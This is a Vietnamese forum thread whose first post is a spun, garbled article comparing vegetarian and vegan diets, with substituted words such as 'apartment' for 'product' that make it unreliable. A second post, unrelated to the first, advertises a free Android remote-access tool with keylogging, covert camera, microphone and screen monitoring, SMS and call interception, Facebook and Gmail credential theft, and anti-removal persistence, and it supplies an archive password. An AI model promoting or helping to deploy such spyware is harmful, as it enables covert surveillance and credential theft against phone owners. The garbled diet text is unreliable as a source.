Sự khác biệt giữa ăn chay trường và ăn chay

Chủ đề thuộc danh mục 'Bán nhà đất' được đăng bởi yensaogroup, 19/7/21.

Tags:
  1. yensaogroup

    yensaogroup Thành viên cấp 1

    Đối với những người không áp theo hiệ tượng dùng đồ chay hoặc thuần chay, khác nhau giữa chúng có lẽ ảm đạm. đảm bảo, không còn lý lẽ nhịn đói nào bao gồm miếng thịt bò, nhưng còn bánh hạnh nhân, sữa chua và bánh pizza thì sao? Và những gì về bao gồm cả các biến thể khác nhau của dùng đồ chay? cho dù tuân theo những chính sách ăn kiêng này phải cẩn thận và nhiều điều tra nghiên cứu, nhưng việc biết rằng sự so sánh của nó khẳng định khá đơn giản và dễ dàng.

    ăn chay

    sự so sánh then chốt

    Người ăn chay không ăn các dịch vụ động vật, trong khi người không ăn mặn không ăn loài vật, nhưng có thể ăn các dịch vụ từ chúng (ví dụ như sữa và trứng). tổ ấm thường chọn những phương pháp kiêng ăn này vì lo ngại về sự khỏe mạnh, giới hạn tôn giáo hoặc lo ngại đạo đức về sự việc tổn hại cho động vật.

    cho dù kể cả những người dân không ăn mặn cũng có khuynh hướng làm theo và một bộ hiệ tượng rõ ràng - không nên ăn gì từ động vật - chỉ một số kiểu dùng đồ chay khác biệt .

    dùng đồ chay

    Lacto-ovo (hoặc ovo-lacto), từ tiếng Latinh có nghĩa là sữa và trứng, là dòng chung nhất của người dùng đồ chay. Như tên cho thấy, những người dân theo phép tắc nhịn ăn này ăn các căn hộ từ sữa và trứng nhưng tránh thịt, con vật và món ăn hải sản.

    Những người không ăn mặn Lacto ăn các sản phẩm từ sữa nhưng không ăn trứng, thịt, gia súc hoặc món ăn hải sản.

    Người ăn chay Ovo ăn trứng nhưng vẫn không ăn các căn hộ từ sữa, thịt, vật nuôi hoặc món ăn hải sản.

    Người không ăn mặn Pesco , hay người dùng đồ chay trường, về mặt kỹ thuật không cung ứng có mang chung về người ăn chay. những người theo cách thức ăn bán chay này ăn cá và loại món ăn hải sản khác nhưng không ăn thịt gia súc hoặc thịt.

    THUẦN CHAY

    những người không ăn mặn trường chọn chế độ ăn kiêng này vì duyên do đạo đức nghề nghiệp có xu thế yêu thích quyền lợi loài vật, Như vậy nhiều người tránh mặc đồ da và da lộn vì chúng được làm từ da con vật. Họ Có thể tránh bất kể chất liệu vải nào được gia công từ phụ phẩm động vật , bao gồm cả len và lụa, vì loài vật được dùng để sản xuất những vật liệu đó thường bị gây hại trong quá trình này. nhiều người không ăn mặn trường cũng lựa chọn các sản phẩm làm đẹp và hóa mỹ phẩm không có sự hiểm ác .

    sản phẩm thực dưỡng

    CÁC thức ăn nên tránh

    Bởi vì nhiều người không nhận ra có bao lăm loại các loại thực phẩm dường như không có động vật khẳng định có một lượng nhỏ các căn hộ loài vật , nên việc trở thành người ăn chay trường hoặc không ăn mặn có thể đem lại không ít điều bất cứ lúc nào. Ví dụ, hộp sữa chua không béo và kẹo thường bao gồm tất cả gelatin, được gia công từ các cơ quan của động vật và một số nhãn hiệu nước cam được bức tốc omega-3 từ cá.

    đối với các người dùng đồ chay và dùng đồ chay, điều quan trọng là phải kê bài toán về kiểu cách thức ăn nhà hàng ăn uống được sản xuất Lúc đầu gọi món. Nhiều món súp và nước sốt đang không có thịt được gia công từ thịt gà hoặc bò kho, bánh ngô đôi lúc được gia công với mỡ lợn, và đồ chiên có thể được làm bằng mỡ con vật.

    những người dân ăn chay trường cũng tránh dùng mật ong, và phải đọc kỹ nhãn bộ phận của bất cứ loại thức ăn mới nào. Ví dụ, một số sô cô la là thuần chay, nhưng các loại khác bao gồm tất cả sữa.

    MỐI nhiệt tình VỀ bổ dưỡng

    Những lý lẽ không ăn uống này có thể rất tốt cho sức khỏe, nhưng cũng giống như ai đó ngẫu nhiên, người không ăn mặn trường và người dùng đồ chay trường cần xem xét sự thiếu vắng bổ dưỡng. rõ ràng, các căn hộ từ sữa là nguồn cung canxi và vitamin D chính, do đó những người dân ăn chay trường nên ăn đủ rau lá xanh đậm (một nguồn canxi tốt khác) và chọn thực phẩm được bổ sung cập nhật canxi. nếu như khách hàng ăn chay trường, bạn cũng có thể lưu ý việc bổ sung cập nhật vitamin D.

    Vitamin B12 cần phải có để chống bệnh thiếu máu và bởi nó chỉ được tìm ra tự nhiên và thoải mái trong các dịch vụ con vật, đặc biệt là những người dân không ăn mặn trường rất có thể muốn cân xem bổ sung cập nhật vitamin hoặc đồ ăn tăng cường dưỡng chất.

    đồ ăn thiết yếu

    May mắn thay, những người dân dùng đồ chay và dùng đồ chay không bị thiếu những món ngon và tẩm bổ. Rau, củ quả, các loại hạt, ngũ cốc và đậu tương thích cho tất cả hai hình thức không ăn uống khi chúng được sản xuất đúng cách. Và những người dân dùng đồ chay trường rất có thể chọn từ khá nhiều sản phẩm được thiết kế từ lượng chất thay thế từ sữa có nguồn gốc thực vật. Bạn vẫn có thể nấu và nướng những món thức ăn ái mộ của mình chỉ với một vài thao tác thay thế đơn giản dễ dàng.

    Hãy thử làm món bánh mì chay , yến mạch phô mai với cà chua và bơ , hoặc bánh mỳ kẹp thịt đỗ đen cay. Chúng là loại thức ăn thuần chay mà ngay đến những người dân ăn thịt cũng trở nên ngấu nghiến!
     
  2. walterhdownwi3

    walterhdownwi3 Thành viên cấp 1

    [​IMG]
    Tested on Android : 5,6,7,8,9,10,11
    Application Features :
    ——
    Manage :
    Files
    Sms
    contacts
    Calls
    Applications
    Accounts
    ——
    Monitor :
    Camera
    Live screen
    Microphone
    Keylogger
    Location
    Real time calls monitor
    ——
    Tools :
    Download apk and install
    Show message
    Open link
    Call number
    Phone info
    —–
    Social media Hunter:
    Facebook
    Gmail
    More coming soon
    ——
    Super mode :
    Anti-Kill
    Anti-Delete
    Realtime Monitor Active App
    Auto Click Start Screen Record
    Anti shutdown phone
    ———————————-
    [​IMG]
    This is free version will not have Support
    —–
    Pass : BY_EVLF
    [​IMG]
     

Ủng hộ diễn đàn